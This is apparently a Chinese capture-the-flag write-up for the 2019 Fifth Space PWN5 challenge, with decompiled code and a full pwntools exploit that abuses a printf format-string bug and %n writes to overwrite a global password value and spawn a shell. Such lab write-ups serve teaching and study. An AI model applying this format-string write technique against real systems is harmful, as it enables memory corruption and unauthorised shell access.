
[第五空间2019 决赛]PWN5

Ubuntu 18


0x01


checksec

[*] '/home/zelas/Desktop/pwn/[F Space 2019 sc]PWN5/pwn'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found //存在保护
NX: NX enabled //栈不可执行
PIE: No PIE (0x8048000)

IDA

main() 函数（IDA 反编译结果，下方代码即为 main，而非 encrypt）

/*
 * IDA pseudocode of the challenge binary's main().
 * Flow: seed libc's PRNG, read 4 random bytes from /dev/urandom into the
 * global dword_804C044, echo the user's name through printf() WITHOUT a
 * format string, then compare atoi(passwd) against the random dword and
 * spawn a shell on a match. The printf(buf) call is the intended bug.
 */
int __cdecl main(int a1)
{
unsigned int v1; // eax
int result; // eax
int fd; // [esp+0h] [ebp-84h]
char nptr[16]; // [esp+4h] [ebp-80h] BYREF
char buf[100]; // [esp+14h] [ebp-70h] BYREF
unsigned int v6; // [esp+78h] [ebp-Ch]
int *v7; // [esp+7Ch] [ebp-8h]

v7 = &a1;
v6 = __readgsdword(0x14u); // stack canary loaded from gs:0x14 (checksec: Canary found); re-checked before return
setvbuf(stdout, 0, 2, 0); // unbuffered stdout (mode 2 == _IONBF on glibc) so prompts are flushed immediately
v1 = time(0);
srand(v1); // PRNG is seeded, but rand() is never called anywhere in this listing
fd = open("/dev/urandom", 0); // 0 == O_RDONLY; return value is not checked
read(fd, &dword_804C044, 4u); // 4 random bytes into the global at 0x0804C044 (.bss; address is fixed since the binary has no PIE)
printf("your name:");
read(0, buf, 0x63u); // 99 bytes into a 100-byte buffer: no overflow, but read() does not NUL-terminate buf
printf("Hello,");
printf(buf); // BUG: user input used directly as the format string -> %p leaks the stack, %n writes arbitrary memory
printf("your passwd:");
read(0, nptr, 0xFu); // 15 bytes into a 16-byte buffer; again not NUL-terminated
if ( atoi(nptr) == dword_804C044 ) // the "password" is the random dword; overwriting it via %n above makes its value attacker-known
{
puts("ok!!");
system("/bin/sh");
}
else
{
puts("fail");
}
result = 0;
if ( __readgsdword(0x14u) != v6 )
sub_80493D0(); // canary mismatch handler (presumably __stack_chk_fail)
return result;
}

//0x0804C044

0x02


思路 fmt string

1. 利用 printf(buf) 处的格式化字符串漏洞（%n 写入），向 .bss 中存放随机数的 dword_804C044（0x0804C044，程序无 PIE 所以地址固定）逐字节连续写入 4 个字节

   先确定格式化字符串本身在栈上的参数位置（本题为第 10 个参数，可通过发送 AAAA%N$x 之类的探测串逐个确认）

2. 每个 %n 写入的是此前已输出的字节数：payload 前缀是 4 个 4 字节地址共 16 字节（0x10），所以四次写入后该 dword 变为 0x10101010；随后以十进制发送该值即可通过 atoi() 的比较

0x03


exp

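from pwn import *

context(os='linux', arch='i386', log_level='debug')
path = './pwn'
io = process([path])
# io = remote('node4.buuoj.cn', 26083)

# Target: the global dword the "passwd" is compared against (atoi(nptr) == dword_804C044).
# It lives in .bss at a fixed address because the binary has no PIE.
bss_addr = 0x804c044

# Four little-endian addresses covering bss_addr .. bss_addr+3. They are the first bytes
# printf() emits, so every later %n sees exactly len(addrs) bytes already written.
addrs = b''.join(p32(bss_addr + i) for i in range(4))

# The format string starts at stack argument index 10 for this binary (determined
# empirically, e.g. with AAAA%N$x). %10$n .. %13$n store the running byte count into
# each address in turn. Each %n stores a 4-byte int, so the writes overlap and the
# last one also zeroes bss_addr+4 .. bss_addr+6 -- harmless here, but be aware of it.
fmt = ''.join('%%%d$n' % (10 + i) for i in range(4)).encode()
payload = addrs + fmt

# Every %n writes len(addrs) (== 16 == 0x10). With 1-byte-stepped overlapping writes the
# dword ends up as 0x10101010. Derive the value from the prefix length instead of hard-coding
# it, so editing the address list cannot silently desynchronise the passwd we send.
n = len(addrs)
assert n < 256, 'prefix too long for the byte-wise %n write pattern'
passwd = int.from_bytes(bytes([n] * 4), 'little')  # 0x10101010

io.sendlineafter(b'e:', payload)
# atoi() parses the decimal text; send bytes explicitly rather than relying on str coercion.
io.sendlineafter(b'd:', str(passwd).encode())

io.interactive()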

